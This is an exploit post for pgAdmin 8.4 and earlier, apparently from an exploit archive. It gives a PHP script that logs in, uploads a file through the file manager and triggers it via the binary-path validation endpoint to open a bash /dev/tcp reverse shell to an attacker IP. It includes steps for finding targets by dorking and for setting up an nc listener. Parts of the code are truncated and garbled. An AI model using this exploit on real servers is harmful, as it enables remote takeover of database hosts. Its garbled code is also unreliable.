============================================================================================================================================= | # Title : pgAdmin 8.4 PHP Code Execution Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.pgadmin.org/download/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API. This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity of the database management system and the security of the underlying data. [+] Description: The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on. exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target. [+] How to use it: Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine. Verify that your machine is listening on the specified port using nc or a similar tool: nc -lvnp YOUR_PORT [+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine. [+] Line : 156+157 $ip = 'YOUR_IP'; // Replace with your machine's IP $port = 'YOUR_PORT'; // Replace with the port you want to use [+] Line : 164+165+166 $targetUrl = 'http://target-url.com'; // Replace this with the actual address $username = 'admin'; // Username (if required) $password = 'password'; // Password (if required) [+] Save As poc.php [+] usage : cmd=> php poc.php [+] payload : targetUrl = rtrim($targetUrl, '/'); $this->username = $username; $this->password = $password; } public function exploit() { if ($this->authRequired() && (!$this->username || !$this->password)) { die("The application requires authentication, please provide valid credentials.\n"); } if ($this->authRequired()) { $this->authenticate(); echo "Successfully authenticated to pgAdmin\n"; } if (!$this->onWindows()) { die("This exploit is specific to Windows targets!\n"); } $fileName = 'reverse_shell.php'; $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell()); } private function authRequired() { $res = $this->sendRequest('GET', $this->targetUrl . '/'); return strpos($res, 'Location: login') !== false; } private function onWindows() { $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js'); if ($res) { $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';"); return $platform == 'win32'; } return false; } private function authenticate() { $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login'); $this->setCsrfTokenFromLoginPage($loginPage); $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [ 'csrf_token' => $this->csrfToken, 'email' => $this->username, 'password' => $this->password, 'language' => 'en', 'internal_button' => 'Login' ]); if (strpos($res, 'Location: login') !== false) { die("Failed to authenticate to pgAdmin\n"); } } private function setCsrfTokenFromLoginPage($response) { if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) { $this->csrfToken = $matches[1]; } elseif (preg_match('/csrfToken = $matches[1]; } else { die("Failed to obtain the CSRF token\n"); } } private function fileManagerUploadAndTrigger($filePath, $fileContents) { list($transId, $homeFolder) = $this->fileManagerInit(); $formData = [ 'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath), 'mode' => 'add', 'currentpath' => $homeFolder, 'storage_folder' => 'my_storage' ]; $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true); if (strpos($res, '"success":1') === false) { die("Failed to upload file contents\n"); } $uploadPath = $this->getStringBetween($res, '"Name":"', '"'); echo "Payload uploaded to: {$uploadPath}\n"; $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([ 'utility_path' => substr($uploadPath, 0, -15) ]), true); } private function fileManagerInit() { $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([ 'dialog_type' => 'storage_dialog', 'supported_types' => ['sql', 'csv', 'json', '*'], 'dialog_title' => 'Storage Manager' ])); $transId = $this->getStringBetween($res, '"transId":"', '"'); $homeFolder = $this->getStringBetween($res, '"homedir":"', '"'); if (!$transId || !$homeFolder) { die("Failed to initialize a file manager transaction Id or home folder\n"); } return [$transId, $homeFolder]; } private function sendRequest($method, $url, $data = [], $multipart = false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); if ($method == 'POST') { curl_setopt($ch, CURLOPT_POST, true); if ($multipart) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } else { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); } } if ($this->csrfToken) { curl_setopt($ch, CURLOPT_HTTPHEADER, [ "X-pgA-CSRFToken: {$this->csrfToken}" ]); } $response = curl_exec($ch); if (curl_errno($ch)) { die("cURL Error: " . curl_error($ch) . "\n"); } curl_close($ch); return $response; } private function getStringBetween($string, $start, $end) { $string = ' ' . $string; $ini = strpos($string, $start); if ($ini == 0) return ''; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } private function generateReverseShell() { // حمولة الاتصال العكسي باستخدام Netcat $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه $shell = " /dev/tcp/$ip/$port 0>&1'\"); ?>"; return $shell; } } // مثال على الاستخدام $targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي $username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا) $password = 'password'; // كلمة المرور (إذا كانت مطلوبة) $exploit = new PGAdminExploit($targetUrl, $username, $password); $exploit->exploit(); ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================